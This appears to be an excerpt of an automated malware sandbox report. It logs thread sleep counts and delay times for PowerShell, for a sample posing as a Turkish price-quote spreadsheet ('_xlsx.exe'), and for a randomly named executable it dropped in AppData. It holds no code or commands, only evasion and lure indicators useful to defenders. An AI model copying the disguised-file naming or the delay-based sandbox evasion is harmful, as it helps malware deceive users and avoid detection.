Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7784	Thread sleep count: 6211 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7980	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7784	Thread sleep count: 92 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7876	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8032	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7984	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8136	Thread sleep count: 3461 > 30	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8136	Thread sleep count: 6395 > 30	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -599764s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -599654s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -598999s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -598671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -598341s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -598233s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -598124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -597796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -597577s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -597248s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -597030s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -596921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -596593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -596374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -596265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -596046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -595937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -595828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -595718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -595609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -595499s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -595390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -595280s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -595171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -595062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -594843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132	Thread sleep time: -594624s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 8068	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 2868	Thread sleep count: 3586 > 30
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 2868	Thread sleep count: 6252 > 30
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -599219s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -599094s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -598984s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -598875s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -598765s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -598656s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -598547s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -598438s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -598313s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -598188s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -598078s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -597969s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -597844s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -597734s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -597625s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -597516s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -597406s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -597294s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -597185s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -597074s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -596967s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -596827s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -596650s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -596345s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -596219s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -596109s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -596000s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -595891s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -595781s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -595662s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -595547s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -595437s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -595328s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -595216s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -595109s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -594997s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -594890s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -594781s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -594671s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -594562s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -594452s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -594344s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896	Thread sleep time: -594234s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599764	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599654	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598341	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598233	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598124	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597577	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597248	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597030	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596374	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596046	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595499	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595280	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594624	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 598547
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 598438
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 598313
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 598188
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 598078
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 597969
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 597844
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 597734
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 597625
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 597516
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 597406
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 597294
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 597185
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 597074
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 596967
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Thread delayed: delay time: 596827
